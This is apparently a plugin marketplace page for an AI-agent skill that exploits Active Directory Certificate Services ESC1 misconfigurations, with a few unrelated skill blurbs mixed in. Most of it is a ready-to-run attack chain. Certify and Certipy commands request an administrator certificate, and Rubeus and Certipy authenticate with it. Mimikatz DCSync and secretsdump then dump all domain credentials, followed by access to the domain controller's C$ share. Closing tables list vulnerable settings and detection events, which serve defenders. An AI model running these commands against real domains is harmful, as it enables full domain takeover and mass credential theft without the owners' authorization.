From cybersecurity-skills
Exploits AD CS ESC1 misconfigurations to request certificates impersonating Domain Admins and escalate domain privileges in authorized red team assessments.
npx claudepluginhub mukul975/anthropic-cybersecurity-skills --plugin cybersecurity-skillsThis skill uses the workspace's default tool permissions.
ESC1 (Escalation Scenario 1) is a critical misconfiguration in Active Directory Certificate Services where a certificate template allows a low-privileged user to request a certificate on behalf of any other user, including Domain Admins. The vulnerability exists when a template has the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag enabled (also called "Supply in Request"), combined with an Extended Ke...
Applies Acme Corporation brand guidelines including colors, fonts, layouts, and messaging to generated PowerPoint, Excel, and PDF documents.
Builds DCF models with sensitivity analysis, Monte Carlo simulations, and scenario planning for investment valuation and risk assessment.
Calculates profitability (ROE, margins), liquidity (current ratio), leverage, efficiency, and valuation (P/E, EV/EBITDA) ratios from financial statements in CSV, JSON, text, or Excel for investment analysis.
ESC1 (Escalation Scenario 1) is a critical misconfiguration in Active Directory Certificate Services where a certificate template allows a low-privileged user to request a certificate on behalf of any other user, including Domain Admins. The vulnerability exists when a template has the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag enabled (also called "Supply in Request"), combined with an Extended Key Usage (EKU) that permits client authentication (Client Authentication, PKINIT Client Authentication, Smart Card Logon, or Any Purpose). This allows an attacker to specify an arbitrary Subject Alternative Name (SAN) in the certificate request, effectively impersonating any domain user. ESC1 was documented by SpecterOps researchers Will Schroeder and Lee Christensen in their "Certified Pre-Owned" whitepaper (2021) and remains one of the most common AD CS attack paths. The MITRE ATT&CK framework tracks this as T1649 (Steal or Forge Authentication Certificates).
# Using Certify (Windows)
Certify.exe cas
# Using Certipy (Linux/Python)
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.10.10.1
# Using Certify - find vulnerable templates
Certify.exe find /vulnerable
# Using Certipy - outputs JSON and text reports
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.10.10.1 -vulnerable
msPKI-Certificate-Name-Flag contains ENROLLEE_SUPPLIES_SUBJECTpkiExtendedKeyUsage contains Client Authentication or Smart Card LogonmsPKI-Enrollment-Flag does not require manager approval# Using Certify (Windows)
Certify.exe request /ca:DC01.domain.local\domain-CA /template:VulnerableTemplate /altname:administrator
# Using Certipy (Linux)
certipy req -u user@domain.local -p 'Password123' -ca 'domain-CA' -target DC01.domain.local -template VulnerableTemplate -upn administrator@domain.local
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
# Using Rubeus (Windows)
Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /password:<pfx-password> /ptt
# Using Certipy (Linux)
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1
# DCSync to dump all domain credentials
mimikatz.exe "lsadump::dcsync /domain:domain.local /all"
# Or using secretsdump.py with the obtained NT hash
secretsdump.py domain.local/administrator@DC01.domain.local -hashes :ntlmhash
# List domain controllers
dir \\DC01.domain.local\C$
# Access Domain Admin shares
dir \\DC01.domain.local\SYSVOL
| Tool | Purpose | Platform |
|---|---|---|
| Certify | AD CS enumeration and certificate requests | Windows (.NET) |
| Certipy | AD CS enumeration, request, and authentication | Linux (Python) |
| Rubeus | Kerberos authentication with certificates (PKINIT) | Windows (.NET) |
| Mimikatz | Credential dumping post-escalation | Windows |
| secretsdump.py | Remote credential dumping (Impacket) | Linux (Python) |
| PSPKIAudit | PowerShell AD CS auditing module | Windows |
| ForgeCert | Certificate forgery tool | Windows (.NET) |
| Condition | Vulnerable Value |
|---|---|
| msPKI-Certificate-Name-Flag | ENROLLEE_SUPPLIES_SUBJECT (1) |
| pkiExtendedKeyUsage | Client Authentication (1.3.6.1.5.5.7.3.2) |
| Enrollment Rights | Domain Users or Authenticated Users |
| msPKI-Enrollment-Flag | No manager approval required |
| CA Setting | No approval workflow enforced |
| Indicator | Detection Method |
|---|---|
| Certificate request with SAN different from requester | Windows Event 4886 / 4887 on CA server |
| Unusual PKINIT authentication | Event 4768 with certificate-based pre-auth |
| Certify.exe or Certipy execution | EDR process monitoring and command-line logging |
| Mass certificate template enumeration | LDAP query monitoring for pkiCertificateTemplate objects |
| Certificate issued to non-matching UPN | CA audit logs and certificate transparency |